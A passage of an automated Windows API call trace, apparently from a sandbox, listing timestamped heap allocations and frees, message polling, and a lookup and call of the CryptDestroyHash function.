Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0041.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.861] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0041.861] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.861] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0041.861] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0041.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.863] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0041.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0041.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae968 [0041.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae968, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0041.864] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0041.865] CryptDestroyHash (hHash=0x7c2100) returned 1 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.866] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 